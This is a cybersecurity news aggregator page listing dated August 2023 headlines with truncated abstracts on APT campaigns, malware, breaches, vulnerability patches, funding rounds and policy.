The Chinese threat actor known as APT31 (aka Bronze Vinewood, Judgement Panda, or Violet Typhoon) has been linked to a set of advanced backdoors that are capable of exfiltrating harvested sensitive information to Dropbox. The malware is part of a broader collection of more than 15 implants that have been put to use by the adversary in attacks targeting industrial organizations in Eastern Europe in 2022. "The attackers aimed to establish a permanent channel for data exfiltration, including data stored on air-gapped systems," Kaspersky said in an analysis spotlighting APT31's previously undocumented tradecraft. The intrusions employ a three-stage malware stack, each focused on disparate aspects of the attack chain: setting up persistence, gathering sensitive data, and transmitting the information to a remote server under the threat actor's control. Some variants of the second-stage backdoors also come with features designed to look up file names in the MicrosoThe Hacker News
August 11, 2023
Charming Kitten APT is targeting Iranian dissidents in Germany Full Text
Abstract
Germany’s Federal Office for the Protection of the Constitution (BfV) warns that the Charming Kitten APT group targeted Iranian dissidents in the country. The Federal Office for the Protection of the Constitution (BfV) is warning that an alleged...Security Affairs
August 11, 2023 – Policy and Law
India Passes Data Protection Legislation in Parliament. Critics Fear Privacy Violation Full Text
Abstract
Indian lawmakers Wednesday approved a data protection legislation that “seeks to better regulate big tech firms and penalize companies for data breaches” as several groups expressed concern over citizens’ privacy rights.Cyware
August 11, 2023 – Attack
New SystemBC Malware Variant Targets Southern African Power Company Full Text
Abstract
An unknown threat actor has been linked to a cyber attack on a power generation company in southern Africa with a new variant of the SystemBC malware called DroxiDat as a precursor to a suspected ransomware attack. "The proxy-capable backdoor was deployed alongside Cobalt Strike Beacons in a south African nation's critical infrastructure," Kurt Baumgartner, principal security researcher at Kaspersky's Global Research and Analysis Team (GReAT), said . The Russian cybersecurity company said the attack, which took place in late March 2023, was in its early stages and involved the use of DroxiDat to profile the system and proxy network traffic using the SOCKS5 protocol to and from command-and-control (C2) infrastructure. SystemBC is a C/C++-based commodity malware and remote administrative tool that was first seen in 2019 . Its main feature is to set up SOCKS5 proxies on victim computers that can then be used by threat actors to tunnel malicious traffic associThe Hacker News
August 11, 2023 – Criminals
California City Investigating Data Theft After Ransomware Group’s Claims Full Text
Abstract
The LockBit gang added 15 victims to its leak site on Wednesday including El Cerrito, which is home to more than 25,000 residents and is about 10 minutes north of Oakland.Cyware
August 11, 2023 – Vulnerabilities
16 New CODESYS SDK Flaws Expose OT Environments to Remote Attacks Full Text
Abstract
A set of 16 high-severity security flaws have been disclosed in the CODESYS V3 software development kit (SDK) that could result in remote code execution and denial-of-service under specific conditions, posing risks to operational technology (OT) environments. The flaws, tracked from CVE-2022-47378 through CVE-2022-47393 and dubbed CoDe16 , carry a CVSS score of 8.8 with the exception of CVE-2022-47391, which has a severity rating of 7.5. Twelve of the flaws are buffer overflow vulnerabilities. "Exploitation of the discovered vulnerabilities, which affect all versions of CODESYS V3 prior to version 3.5.19.0, could put operational technology (OT) infrastructure at risk of attacks, such as remote code execution (RCE) and denial-of-service (DoS)," Vladimir Tokarev of the Microsoft Threat Intelligence Community said in a report. While a successful weaponization of the flaws requires user authentication as well as an in-depth knowledge of the proprietary protocol of CODESYThe Hacker News
August 11, 2023 – Government
CISA Adds Microsoft .NET Vulnerability to KEV Catalog Due to Active Exploitation Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a recently patched security flaw in Microsoft's .NET and Visual Studio products to its Known Exploited Vulnerabilities ( KEV ) catalog, citing evidence of active exploitation. Tracked as CVE-2023-38180 (CVSS score: 7.5), the high-severity flaw relates to a case denial-of-service (DoS) impacting .NET and Visual Studio. It was addressed by Microsoft as part of its August 2023 Patch Tuesday updates shipped earlier this week, tagging it with an "Exploitation More Likely" assessment. While exact details surrounding the nature of exploitation are unclear, the Windows maker has acknowledged the existence of a proof-of-concept (PoC) in its advisory. It also said that attacks leveraging the flaw can be pulled off without any additional privileges or user interaction. "Proof-of-concept exploit code is available, or an attack demonstration is not practical for most systems," the companyThe Hacker News
August 10, 2023 – Business
Sweet Security Raises $12M Seed Round for its Cloud Security Suite Full Text
Abstract
The $12 million seed round was led by Glilot Capital Partners, with participation from CyberArk Ventures and a number of angel investors including Gerhard Eschelbeck, a former CISO at Google, and Travis McPeak, who led product security at Databricks.Cyware
August 10, 2023 – Attack
New Attack Alert: Freeze[.]rs Injector Weaponized for XWorm Malware Attacks Full Text
Abstract
Malicious actors are using a legitimate Rust-based injector called Freeze[.]rs to deploy a commodity malware called XWorm in victim environments. The novel attack chain, detected by Fortinet FortiGuard Labs on July 13, 2023, is initiated via a phishing email containing a booby-trapped PDF file. It has also been used to introduce Remcos RAT by means of a crypter called SYK Crypter, which was first documented by Morphisec in May 2022. "This file redirects to an HTML file and utilizes the 'search-ms' protocol to access an LNK file on a remote server," security researcher Cara Lin said . "Upon clicking the LNK file, a PowerShell script executes Freeze[.]rs and SYK Crypter for further offensive actions." Freeze[.]rs, released on May 4, 2023, is a open-source red teaming tool from Optiv that functions as a payload creation tool used for circumventing security solutions and executing shellcode in a stealthy manner. "Freeze[.]rs utilizes multiple tecThe Hacker News
August 10, 2023 – Malware
Statc Stealer, a new sophisticated info-stealing malware Full Text
Abstract
Experts warn that a new info-stealer named Statc Stealer is infecting Windows devices to steal a broad range of sensitive information. Zscaler ThreatLabz researchers discovered a new information stealer malware, called Statc Stealer, that...Security Affairs
August 10, 2023 – Vulnerabilities
Fourty Vulnerabilities Patched in Android With August 2023 Security Updates Full Text
Abstract
“Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible,” Google noted in its security bulletin.Cyware
August 10, 2023 – Malware
New Statc Stealer Malware Emerges: Your Sensitive Data at Risk Full Text
Abstract
A new information malware strain called Statc Stealer has been found infecting devices running Microsoft Windows to siphon sensitive personal and payment information. "Statc Stealer exhibits a broad range of stealing capabilities, making it a significant threat," Zscaler ThreatLabz researchers Shivam Sharma and Amandeep Kumar said in a technical report published this week. "It can steal sensitive information from various web browsers, including login data, cookies, web data, and preferences. Additionally, it targets cryptocurrency wallets, credentials, passwords, and even data from messaging apps like Telegram." Written in C++, the malicious stealer finds its way into victim systems when potential victims are tricked into clicking on seemingly innocuous ads, with the stealer imitating an MP4 video file format on web browsers like Google Chrome. The first-stage payload, while dropping and executing a decoy PDF installer, also stealthily deploys a downloaderThe Hacker News
August 10, 2023 – Government
CISA discovered a new backdoor, named Whirlpool, used in Barracuda ESG attacks Full Text
Abstract
The U.S. Cybersecurity & Infrastructure Security Agency (CISA) observed a new backdoor, named Whirlpool, in attacks on Barracuda ESG appliances. The U.S. Cybersecurity & Infrastructure Security Agency (CISA) has discovered a new backdoor,...Security Affairs
August 10, 2023 – Criminals
IRS Confirms Takedown of Bulletproof Hosting Provider Lolek Full Text
Abstract
A popular bulletproof hosting platform was taken down by authorities in the U.S. and Poland this week, marking the latest effort to limit the anonymous access cybercriminals have to critical tools.Cyware
August 10, 2023 – Vulnerabilities
Emerging Attacker Exploit: Microsoft Cross-Tenant Synchronization Full Text
Abstract
Attackers continue to target Microsoft identities to gain access to connected Microsoft applications and federated SaaS applications. Additionally, attackers continue to progress their attacks in these environments, not by exploiting vulnerabilities, but by abusing native Microsoft functionality to achieve their objective. The attacker group Nobelium, linked with the SolarWinds attacks, has been documented using native functionality like the creation of Federated Trusts [1] to enable persistent access to a Microsoft tenant. This article demonstrates an additional native functionality that when leveraged by an attacker enables persistent access to a Microsoft cloud tenant and lateral movement capabilities to another tenant. This attack vector enables an attacker operating in a compromised tenant to abuse a misconfigured Cross-Tenant Synchronization (CTS) configuration and gain access to other connected tenants or deploy a rogue CTS configuration to maintain persistence within the teThe Hacker News
August 10, 2023 – Government
CISA adds actively exploited flaw in .NET, Visual Studio to its Known Exploited Vulnerabilities catalog Full Text
Abstract
US CISA added zero-day vulnerability CVE-2023-38180 affecting .NET and Visual Studio to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added an actively exploited zero-day vulnerability CVE-2023-38180...Security Affairs
August 10, 2023 – Vulnerabilities
Adobe Patches 30 Acrobat, Reader Vulnerabilities on Patch Tuesday Full Text
Abstract
Adobe on Tuesday rolled out a big batch of security updates for its flagship Acrobat and Reader software, patching at least 30 vulnerabilities affecting Windows and macOS installations.Cyware
August 10, 2023 – Vulnerabilities
Encryption Flaws in Popular Chinese Language App Put Users’ Typed Data at Risk Full Text
Abstract
A widely used Chinese language input app for Windows and Android has been found vulnerable to serious security flaws that could allow a malicious interloper to decipher the text typed by users. The findings from the University of Toronto's Citizen Lab, which carried out an analysis of the encryption mechanism used in Tencent's Sogou Input Method , an app that has over 455 million monthly active users across Windows, Android, and iOS. The vulnerabilities are rooted in EncryptWall, the service's custom encryption system, allowing network eavesdroppers to extract the textual content and access sensitive data. "The Windows and Android versions of Sogou Input Method contain vulnerabilities in this encryption system, including a vulnerability to a CBC padding oracle attack , which allow network eavesdroppers to recover the plaintext of encrypted network transmissions, revealing sensitive information including what users have typed," the researchers said . CBC, sThe Hacker News
August 10, 2023 – Government
US Govt launches Artificial Intelligence Cyber Challenge Full Text
Abstract
The US Government House this week launched an Artificial Intelligence Cyber Challenge competition for creating a new generation of AI systems. On Wednesday, the United States Government House introduced an Artificial Intelligence Cyber Challenge competition....Security Affairs
August 10, 2023 – Breach
Update: The MOVEit Spree is as Bad as — or Worse — Than You Think it is Full Text
Abstract
The mass exploit of a zero-day vulnerability in MOVEit has compromised more than 600 organizations and 40 million individuals to date, but the numbers mask a more disastrous outcome that’s still unfolding.Cyware
August 10, 2023 – Phishing
Cybercriminals Increasingly Using EvilProxy Phishing Kit to Target Executives Full Text
Abstract
Threat actors are increasingly using a phishing-as-a-service (PhaaS) toolkit dubbed EvilProxy to pull off account takeover attacks aimed at high-ranking executives at prominent companies. According to Proofpoint, an ongoing hybrid campaign has leveraged the service to target thousands of Microsoft 365 user accounts, sending approximately 120,000 phishing emails to hundreds of organizations worldwide between March and June 2023. Nearly 39% of the hundreds of compromised users are said to be C-level executives, including CEOs (9%) and CFOs (17%). The attacks have also singled out personnel with access to financial assets or sensitive information. At least 35% of all compromised users had additional account protections enabled. The campaigns are seen as a response to the increased adoption of multi-factor authentication (MFA) in enterprises, prompting threat actors to evolve their tactics to bypass new security layers by incorporating adversary-in-the-middle ( AitM ) phishing kits toThe Hacker News
August 10, 2023 – Breach
Data of all serving police officers Police Service of Northern Ireland (PSNI) mistakenly published online Full Text
Abstract
Police Service of Northern Ireland (PSNI) mistakenly shared sensitive data of all 10,000 serving police officers in response to a FOI request. The Police Service of Northern Ireland (PSNI) has mistakenly shared sensitive data of all 10,000 serving...Security Affairs
August 10, 2023 – Government
NIST Releases Draft Overhaul of Its Core Cybersecurity Framework Full Text
Abstract
The National Institute of Standards and Technology released a long-anticipated draft version of the Cybersecurity Framework 2.0 Tuesday, the first major update of the agency’s risk guidance since 2014.Cyware
August 10, 2023 – Criminals
Interpol Busts Phishing-as-a-Service Platform ‘16Shop,’ Leading to 3 Arrests Full Text
Abstract
Interpol has announced the takedown of a phishing-as-a-service (PhaaS) platform called 16Shop, in addition to the arrests of three individuals in Indonesia and Japan. 16Shop specialized in the sales of phishing kits that other cybercriminals can purchase to mount phishing attacks on a large scale, ultimately facilitating the theft of credentials and payment details from users of popular services such as Apple, PayPal, American Express, Amazon, and Cash App, among others. "Victims typically receive an email with a pdf file or link that redirects to a site requesting the victims' credit card or other personally identifiable information," Interpol said . "This information is then stolen and used to extract money from the victims." No less than 70,000 users across 43 countries are estimated to have been compromised via services offered on 16Shop. The law enforcement operation has also led to the arrest of the site's administrator, a 21-year-old IndonesianThe Hacker News
August 10, 2023 – Attack
Pro-Russian Hacker Group Claims Attacks on French, Dutch Websites Full Text
Abstract
The latest attacks come a week after the group, NoName057(16), hit Spanish and Italian government and private sector organizations with distributed denial-of-service (DDoS) attacks.Cyware
August 10, 2023 – General
Report: 37% Of Third-Party Applications Have High-Risk Permissions Full Text
Abstract
Examining data since 2013, Abnormal identified a massive increase in third-party apps integrated with email, underscoring the proliferation of an emerging threat vector that cybercriminals are exploiting as they continue to shift their tactics.Cyware
August 9, 2023 – Business
Horizon3 AI Raises $40 Million to Expand Automated Pentesting Platform Full Text
Abstract
The additional funding will help the San Francisco-based company integrate pentesting, SOAR, and detection engineering into its platform and expand its channel and partner presence to fuel global growth.Cyware
August 09, 2023 – Vulnerabilities
Collide+Power, Downfall, and Inception: New Side-Channel Attacks Affecting Modern CPUs Full Text
Abstract
Cybersecurity researchers have disclosed details of a trio of side-channel attacks that could be exploited to leak sensitive data from modern CPUs. Called Collide+Power ( CVE-2023-20583 ), Downfall ( CVE-2022-40982 ), and Inception ( CVE-2023-20569 ), the novel methods follow the disclosure of another newly discovered security vulnerability affecting AMD's Zen 2 architecture-based processors known as Zenbleed (CVE-2023-20593). "Downfall attacks target a critical weakness found in billions of modern processors used in personal and cloud computers," Daniel Moghimi , senior research scientist at Google, said . "This vulnerability [...] enables a user to access and steal data from other users who share the same computer." In a hypothetical attack scenario, a malicious app installed on a device could weaponize the method to steal sensitive information like passwords and encryption keys, effectively undermining Intel's Software Guard eXtensions ( SGXThe Hacker News
August 9, 2023 – Malware
Balada Injector still at large – new domains discovered Full Text
Abstract
The Balada Injector is still at large and still evading security software by utilizing new domain names and using new obfuscation. During a routine web monitoring operation, we discovered an address that led us down a rabbit hole of WordPress-orientated...Security Affairs
August 9, 2023 – General
Data Exfiltration is Now the Go-to Cyber Extortion Strategy Full Text
Abstract
The abuse of zero-day and one-day vulnerabilities in the past six months led to a 143% increase in victims when comparing Q1 2022 with Q1 2023, according to a report by Akamai.Cyware
August 09, 2023 – Attack
China-Linked Hackers Strike Worldwide: 17 Nations Hit in 3-Year Cyber Campaign Full Text
Abstract
Hackers associated with China's Ministry of State Security (MSS) have been linked to attacks in 17 different countries in Asia, Europe, and North America from 2021 to 2023. Cybersecurity firm Recorded Future attributed the intrusion set to a nation-state group it tracks under the name RedHotel (previously Threat Activity Group-22 or TAG-22), which overlaps with a cluster of activity broadly monitored as Aquatic Panda , Bronze University , Charcoal Typhoon, Earth Lusca , and Red Scylla (or Red Dev 10). Active since 2019, some of the prominent sectors targeted by the prolific actor encompass academia, aerospace, government, media, telecommunications, and research. A majority of the victims during the period were government organizations. "RedHotel has a dual mission of intelligence gathering and economic espionage," the cybersecurity company said , calling out its persistence, operational intensity, and global reach. "It targets both government entities forThe Hacker News
August 9, 2023 – Phishing
EvilProxy used in massive cloud account takeover scheme Full Text
Abstract
Cloud account takeover scheme utilizing EvilProxy hit over 100 top-level executives of global organizations EvilProxy was observed sending 120,000 phishing emails to over a hundred organizations to steal Microsoft 365 accounts. Proofpoint noticed...Security Affairs
August 9, 2023 – General
Hackers Prepare to Take on a Satellite at DEF CON Full Text
Abstract
The annual Hack-A-Sat CTF competition held at Aerospace Village at the DEF CON in Las Vegas is the first time an on-orbit satellite will test contestants' mettle while bringing together hackers who don’t typically work on space systems.Cyware
August 09, 2023 – Solution
Continuous Security Validation with Penetration Testing as a Service (PTaaS) Full Text
Abstract
Validate security continuously across your full stack with Pen Testing as a Service. In today's modern security operations center (SOC), it's a battle between the defenders and the cybercriminals. Both are using tools and expertise – however, the cybercriminals have the element of surprise on their side, and a host of tactics, techniques, and procedures (TTPs) that have evolved. These external threat actors have now been further emboldened in the era of AI with open-source tools like ChatGPT. With the potential of an attack leading to a breach within minutes, CISOs now are looking to prepare all systems and assets for cyber resilience and rapid response when needed. With tools and capabilities to validate security continuously – including penetration testing as a service – DevSecOps teams can remediate critical vulnerabilities fast due to the easy access to tactical support to the teams that need it the most. This gives the SOC and DevOps teams tools to that remove false poThe Hacker News
August 9, 2023 – Vulnerabilities
Downfall Intel CPU side-channel attack exposes sensitive data Full Text
Abstract
Google researcher Daniel Moghimi devised a new side-channel attack technique, named Downfall, against Intel CPU. Google researcher Daniel Moghimi devised a new side-channel attack technique Intel CPU, named Downfall, that relies on a flaw tracked...Security Affairs
August 9, 2023 – Ransomware
The Ransomware Rollercoaster Continues as Criminals Advance Their Business Models Full Text
Abstract
Ransomware shows no signs of slowing, with ransomware activity ending 13 times higher than at the start of 2023 as a proportion of all malware detections, according to Fortinet.Cyware
August 09, 2023 – Solution
New Android 14 Security Feature: IT Admins Can Now Disable 2G Networks Full Text
Abstract
Google has introduced a new security feature in Android 14 that allows IT administrators to disable support for 2G cellular networks in their managed device fleet. The search giant said it's introducing a second user setting to turn off support, at the model level, for null-ciphered cellular connections . "The Android Security Model assumes that all networks are hostile to keep users safe from network packet injection, tampering, or eavesdropping on user traffic," Roger Piqueras Jover, Yomna Nasser, and Sudhi Herle said . "Android does not rely on link-layer encryption to address this threat model. Instead, Android establishes that all network traffic should be end-to-end encrypted (E2EE)." 2G networks, in particular, employ weak encryption and lack mutual authentication, rendering them susceptible to over-the-air interception and traffic decryption attacks by impersonating a real 2G tower. The threat posed by rogue cellular base stations means thThe Hacker News
August 9, 2023 – Breach
LockBit threatens to leak medical data of cancer patients stolen from Varian Medical Systems Full Text
Abstract
The LockBit ransomware group threatens to leak medical data of cancer patients stolen from Varian Medical Systems. The LockBit ransomware group claims to have hacked the healthcare company Varian Medical Systems and threatens to leak the medical data...Security Affairs
August 9, 2023 – Business
Rubrik Buys Startup Laminar to Unify Cyber Posture, Recovery Full Text
Abstract
Rubrik purchased a data security posture management startup backed by Salesforce and SentinelOne to provide visibility into where a company's data lives and who has access.Cyware
August 09, 2023 – Breach
U.K. Electoral Commission Breach Exposes Voter Data of 40 Million Britons Full Text
Abstract
The U.K. Electoral Commission on Tuesday disclosed a "complex" cyber attack on its systems that went undetected for over a year, allowing the threat actors to access years worth of voter data belonging to 40 million people. "The incident was identified in October 2022 after suspicious activity was detected on our systems," the regulator said . "It became clear that hostile actors had first accessed the systems in August 2021." The intrusion enabled unauthorized access to the Commission's servers hosting email, control systems, and copies of the electoral registers it maintains for research purposes. The identity of the intruders are presently unknown. The registers included the name and address of anyone in the U.K. who registered to vote between 2014 and 2022, as well as the names of those registered as overseas voters. However, they did not contain information of those who qualified to register anonymously and addresses of overseas electors regiThe Hacker News
August 9, 2023 – Attack
Big Cyberespionage Attack Against Japan Attributed to China Full Text
Abstract
Classified military networks run by Japan reportedly suffered a massive breach in 2020 at the hands of a Chinese cyberespionage group that proved tough to eject even after being discovered.Cyware
August 09, 2023 – Vulnerabilities
Microsoft Releases Patches for 74 New Vulnerabilities in August Update Full Text
Abstract
Microsoft has patched a total of 74 flaws in its software as part of the company's Patch Tuesday updates for August 2023, down from the voluminous 132 vulnerabilities the company fixed last month. This comprises six Critical, 67 Important, and one Moderate severity vulnerabilities. Released along with the security improvements are two defense-in-depth updates for Microsoft Office ( ADV230003 ) and the Memory Integrity System Readiness Scan Tool ( ADV230004 ). The updates are also in addition to 30 issues addressed by Microsoft in its Chromium-based Edge browser since last month's Patch Tuesday edition and one side-channel flaw impacting certain processor models offered by AMD ( CVE-2023-20569 or Inception ). ADV230003 concerns an already known security flaw tracked as CVE-2023-36884 , a remote code execution vulnerability in Office and Windows HTML that has been actively exploited by the Russia-linked RomCom threat actor in attacks targeting Ukraine as well as pro-UkrThe Hacker News
August 9, 2023 – Solution
Android 14 Introduces First-Of-Its-Kind Cellular Connectivity Security Features Full Text
Abstract
Android 14 introduces new security measures to mitigate the risks associated with 2G networks, allowing users and enterprises to disable 2G connectivity and protect against potential attacks.Cyware
August 09, 2023 – Cryptocurrency
Malicious Campaigns Exploit Weak Kubernetes Clusters for Crypto Mining Full Text
Abstract
Exposed Kubernetes (K8s) clusters are being exploited by malicious actors to deploy cryptocurrency miners and other backdoors. Cloud security firm Aqua, in a report shared with The Hacker News, said a majority of the clusters belonged to small to medium-sized organizations, with a smaller subset tied to bigger companies, spanning financial, aerospace, automotive, industrial, and security sectors. In total, Kubernetes clusters belonging to more than 350 organizations, open-source projects, and individuals were discovered, 60% of which were the target of an active crypto-mining campaign. The publicly-accessible clusters, per Aqua, are said to suffer from two different kinds of misconfigurations: allowing anonymous access with high privileges and running kubectl proxy with the flags "--address=`0.0.0.0` --accept-hosts `.*`" "Housing a wide array of sensitive and valuable assets, Kubernetes clusters can store customer data, financial records, intellectual property, aThe Hacker News
August 9, 2023 – Breach
Lockbit Threatens to Leak Medical Data of Cancer Patients Stolen From Varian Medical Systems Full Text
Abstract
Lockbit has fixed the deadline for the ransom payment on August 17, 2023. If confirmed the incident could have a dramatic impact on the privacy of cancer patients. The company has yet to disclose the security incident.Cyware
August 09, 2023 – Criminals
New Report Exposes Vice Society’s Collaboration with Rhysida Ransomware Full Text
Abstract
Tactical similarities have been unearthed between the double extortion ransomware group known as Rhysida and Vice Society , including in their targeting of education and healthcare sectors. "As Vice Society was observed deploying a variety of commodity ransomware payloads, this link does not suggest that Rhysida is exclusively used by Vice Society, but shows with at least medium confidence that Vice Society operators are now using Rhysida ransomware," Check Point said in a new report. Vice Society , tracked by Microsoft under the name Storm-0832, has a pattern of employing already existing ransomware binaries that are sold on criminal forums to pull off their attacks. The financially motivated gang has also been observed resorting to pure extortion-themed attacks wherein the data is exfiltrated without encrypting them. First observed in May 2023, the Rhysida ransomware group is known to rely on phishing attacks and Cobalt Strike to breach targets' networks andThe Hacker News
August 9, 2023 – Policy and Law
For TSA’s Updated Pipeline Security Directive, Consistency and Collaboration are Key Full Text
Abstract
This most recent update does not vacate previously established requirements in the simple pursuit of change. Instead, the new directive pursues incremental change that builds on but does not abandon previous requirements.Cyware
August 8, 2023 – Attack
Ukrainian State Agencies Targeted with Open-Source Malware MerlinAgent Full Text
Abstract
In early August, an unidentified threat actor tracked as UAC-0154 sent malicious emails to its targets, purportedly containing security tips from Ukraine's computer emergency response team (CERT-UA).Cyware
August 08, 2023 – Malware
QakBot Malware Operators Expand C2 Network with 15 New Servers Full Text
Abstract
The operators associated with the QakBot (aka QBot) malware have set up 15 new command-and-control (C2) servers as of late June 2023. The findings are a continuation of the malware's infrastructure analysis from Team Cymru, and arrive a little over two months after Lumen Black Lotus Labs revealed that 25% of its C2 servers are only active for a single day. "QakBot has a history of taking an extended break each summer before returning sometime in September, with this year's spamming activities ceasing around 22 June 2023," the cybersecurity firm said . "But are the QakBot operators actually on vacation when they aren't spamming, or is this 'break' a time for them to refine and update their infrastructure and tools?" QakBot's C2 network, like in the case of Emotet and IcedID, is characterized by a tiered architecture in which C2 nodes communicate with upstream Tier 2 (T2) C2 nodes hosted on VPS providers geolocated in Russia. A majoThe Hacker News
August 8, 2023 – Vulnerabilities
Microsoft Patch Tuesday for August 2023 fixed 2 actively exploited flaws Full Text
Abstract
Microsoft Patch Tuesday security updates for August 2023 addressed 74 vulnerabilities, including two actively exploited flaws. Microsoft Patch Tuesday security updates for August 2023 addressed 74 new vulnerabilities in multiple products including...Security Affairs
August 8, 2023 – Hacker
New Threat Actor Targets Bulgaria, China, Vietnam, and Other Countries With Customized Yashma Ransomware Full Text
Abstract
The threat actor behind this operation uses an uncommon technique of downloading the ransom note from a GitHub repository, evading detection by embedding it in an embedded batch file.Cyware
August 08, 2023 – Hacker
Hackers Abusing Cloudflare Tunnels for Covert Communications Full Text
Abstract
New research has revealed that threat actors are abusing Cloudflare Tunnels to establish covert communication channels from compromised hosts and retain persistent access. "Cloudflared is functionally very similar to ngrok," Nic Finn, a senior threat intelligence analyst at GuidePoint Security, said . "However, Cloudflared differs from ngrok in that it provides a lot more usability for free, including the ability to host TCP connectivity over cloudflared." A command-line tool for Cloudflare Tunnel, cloudflared allows users to create secure connections between an origin web server and Cloudflare's nearest data center so as to hide the web server IP addresses as well as block volumetric distributed denial-of-service (DDoS) and brute-force login attacks. For a threat actor with elevated access on an infected host, this feature presents a lucrative approach to set up a foothold by generating a token required to establish the tunnel from the victim machine.The Hacker News
August 8, 2023 – Breach
UK Electoral Commission discloses a data breach Full Text
Abstract
The UK Electoral Commission suffered a data breach that exposed voters' personal information between 2014 and 2022. The UK Electoral Commission disclosed a data breach that exposed the personal information of voters in the United Kingdom between 2014...Security Affairs
August 8, 2023 – Government
White House Pushes Cybersecurity Defense for K-12 Schools Full Text
Abstract
Typically understaffed and underfunded when it comes to cybersecurity, American K-12 schools have experienced a ramp-up in ransomware attacks, particularly after the pandemic forced the hasty adoption of remote tools for teaching.Cyware
August 08, 2023 – Education
Understanding Active Directory Attack Paths to Improve Security Full Text
Abstract
Introduced in 1999, Microsoft Active Directory is the default identity and access management service in Windows networks, responsible for assigning and enforcing security policies for all network endpoints. With it, users can access various resources across networks. As things tend to do, times, they are a'changin' – and a few years back, Microsoft introduced Azure Active Directory, the cloud-based version of AD to extend the AD paradigm, providing organizations with an Identity-as-a-Service (IDaaS) solution across both the cloud and on-prem apps. (Note that as of July 11th 2023, this service was renamed to Microsoft Entra ID , but for the sake of simplicity, we'll refer to it as Azure AD in this post) Both Active Directory and Azure AD are critical to the functioning of on-prem, cloud-based, and hybrid ecosystems, playing a key role in uptime and business continuity. And with 90% of organizations using the service for employee authentication, access control and ID managThe Hacker News
August 8, 2023 – Government
HHS Warns Healthcare Sector of Attacks by Rhysida Ransomware Group Full Text
Abstract
Authorities are sounding the alarm about double-extortion attacks against healthcare and public health sector organizations by a relatively new ransomware-as-a-service group, Rhysida, which until recently had mainly focused on other industries.Cyware
August 08, 2023 – Ransomware
New Yashma Ransomware Variant Targets Multiple English-Speaking Countries Full Text
Abstract
An unknown threat actor is using a variant of the Yashma ransomware to target various entities in English-speaking countries, Bulgaria, China, and Vietnam at least since June 4, 2023. Cisco Talos, in a new write-up, attributed the operation with moderate confidence to an adversary of likely Vietnamese origin. "The threat actor uses an uncommon technique to deliver the ransom note," security researcher Chetan Raghuprasad said . "Instead of embedding the ransom note strings in the binary, they download the ransom note from the actor-controlled GitHub repository by executing an embedded batch file." Yashma, first described by the BlackBerry research and intelligence team in May 2022, is a rebranded version of another ransomware strain called Chaos. A month prior to its emergence, the Chaos ransomware builder was leaked in the wild. A notable aspect of the ransom note is its resemblance to the well-known WannaCry ransomware, possibly done so in an attempt to obsThe Hacker News
August 8, 2023 – Government
CISA Unveils Cybersecurity Strategic Plan for Next Three Years Full Text
Abstract
The Cybersecurity Strategic Plan for fiscal years 2024-2026 outlines the agency’s plans for achieving a future where damaging cyberattacks are rare, organizations are resilient, and technology is secure by design.Cyware
August 8, 2023 – Phishing
Massive Phishing Campaign Impersonates 340 Companies Using Over 800 Scam Domains Full Text
Abstract
The phishing operation, originating from Russia but pretending to be Ukrainian, utilized a high-quality single-page application to create convincing websites and steal credit card and bank details.Cyware
August 8, 2023 – Criminals
Nigerian Man Admits to $1.3M Business Email Compromise Scam Full Text
Abstract
A Nigerian national pleaded guilty to participating in a BEC scheme to steal $1.25m from a Boston investment firm. The scam involved using malware and a spoofed domain name to trick the firm into transferring money to attacker-controlled accounts.Cyware
August 8, 2023 – Phishing
Teach a Man to Phish and He’s Set for Life – Krebs on Security Full Text
Abstract
A recent phishing scam has been using an old trick to fool Microsoft Windows users. The scam involves sending an email with an attachment that appears to be a PDF file, but is actually an .eml file disguised as a .pdf.Cyware
August 08, 2023 – Malware
LOLBAS in the Wild: 11 Living-Off-The-Land Binaries Used for Malicious Purposes Full Text
Abstract
Cybersecurity researchers have discovered a set of 11 living-off-the-land binaries-and-scripts ( LOLBAS ) that could be maliciously abused by threat actors to conduct post-exploitation activities. "LOLBAS is an attack method that uses binaries and scripts that are already part of the system for malicious purposes," Pentera security researcher Nir Chako said . "This makes it hard for security teams to distinguish between legitimate and malicious activities, since they are all performed by trusted system utilities." To that end, the Israeli cybersecurity company said it uncovered nine LOLBAS downloaders and three executors that could enable adversaries to download and execute "more robust malware" on infected hosts. This includes: MsoHtmEd.exe, Mspub.exe, ProtocolHandler.exe, ConfigSecurityPolicy.exe, InstallUtil.exe, Mshta.exe, Presentationhost.exe, Outlook.exe, MSAccess.exe, scp.exe, and sftp.exe. "In a complete attack chain, a hacker will usThe Hacker News
August 8, 2023 – Vulnerabilities
43 Android apps in Google Play with 2.5M installs loaded ads when a phone screen was off Full Text
Abstract
Experts found 43 Android apps in Google Play with 2.5 million installs that displayed advertisements while a phone's screen was off. Recently, researchers from McAfee’s Mobile Research Team discovered 43 Android apps in Google Play with 2.5 million...Security Affairs
August 8, 2023 – Business
Cyberinsurance Firm Resilience Raises $100 Million to Expand Its Cyber Risk Platform Full Text
Abstract
The Series D round was led by Intact Ventures, an affiliate of Resilience’s primary capacity provider, Intact Insurance’s underwriting companies, with participation by Lightspeed Venture Partners, as well as General Catalyst and Founders Fund.Cyware
August 8, 2023 – Malware
Latest Batloader Campaigns Use Pyarmor Pro for Evasion Full Text
Abstract
The Batloader initial access malware, used by the group Water Minyades, has upgraded its evasion techniques by utilizing Pyarmor Pro to obfuscate its malicious Python scripts.Cyware
August 7, 2023 – Criminals
Cl0p Ransomware Gang Revises its Extortion Strategy Full Text
Abstract
MOVEit-hijacker Cl0p ransomware gang has changed its extortion tactics and is now using torrents to distribute data stolen in the MOVEit Transfer breaches. Previously, the group utilized Tor data leak sites, but this method was slow and easier to shut down. Through torrents, criminals are expecting ... Read MoreCyware
August 07, 2023 – Malware
New Malware Campaign Targets Inexperienced Cyber Criminals with OpenBullet Configs Full Text
Abstract
A new malware campaign has been observed making use of malicious OpenBullet configuration files to target inexperienced cyber criminals with the goal of delivering a remote access trojan (RAT) capable of stealing sensitive information. Bot mitigation company Kasada said the activity is designed to "exploit trusted criminal networks," describing it as an instance of advanced threat actors "preying on beginner hackers." OpenBullet is a legitimate open-source pen testing tool used for automating credential stuffing attacks. It takes in a configuration file that's tailored to a specific website and can combine it with a password list procured through other means to log successful attempts. "OpenBullet can be used with Puppeteer, which is a headless browser that can be used for automating web interactions," the company said . "This makes it very easy to launch credential stuffing attacks without having to deal with browser windows popping uThe Hacker News
August 7, 2023 – Privacy
Zoom trains its AI model with some user data, without giving them an opt-out option Full Text
Abstract
